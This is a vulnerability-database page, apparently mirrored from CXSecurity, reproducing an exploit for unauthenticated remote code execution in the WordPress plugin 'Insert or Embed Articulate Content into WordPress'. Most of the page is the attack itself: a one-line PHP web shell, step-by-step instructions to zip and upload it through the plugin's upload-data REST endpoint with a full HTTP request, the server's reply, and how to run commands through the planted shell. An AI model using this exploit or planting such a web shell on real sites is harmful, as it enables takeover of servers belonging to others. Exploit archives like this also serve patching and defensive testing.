WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unautorized) - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1639755 漏洞类型
发布时间 2019-06-23 更新时间 2019-06-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019060146
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Authorized RCE : https://cxsecurity.com/issue/WLB-2019060137
# Author : Con7ext

1. Create File > index.php / whatever and index.html
EX: INDEX.html
<html>
HELLO WORLD
</html>
EX: INDEX.php
<?php system($_GET[cmd]; ?>
2. Compress it to zip
3. Make Request to /wordpress/index.php/wp-json/articulate/v1/upload-data
POST /wordpress/index.php/wp-json/articulate/v1/upload-data HTTP/1.1
Host: movie.boniw.io
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://movie.boniw.io/wordpress/wp-admin/post.php?post=16&action=edit
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 808294
Connection: close

-----------------------------57052814523281
Content-Disposition: form-data; name="name"

whatever.zip
-----------------------------57052814523281
Content-Disposition: form-data; name="chunk"

2
-----------------------------57052814523281
Content-Disposition: form-data; name="chunks"

3
-----------------------------57052814523281
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

ANY

4. You will see the message like : 
{"OK": 1, "info": "Upload Complete!", "folder" : "kntl", "path" : "\/wp-content\/uploads\/articulate_uploads\/kntl\/index.html", "name" : {"file_name":"index.html","status":"index_html_file_found"}, "target": "/var/www/html/wordpress/wp-content/uploads/articulate_uploads/kntl"}
5. The you can see site.com/PATH ( site.com/wp-content/uploads/articulate_uploads/kntl/index.php )
6. The you can run command ( JUST ADDING ?cmd EX:  site.com/wp-content/uploads/articulate_uploads/kntl/index.php?cmd={COMMAND} )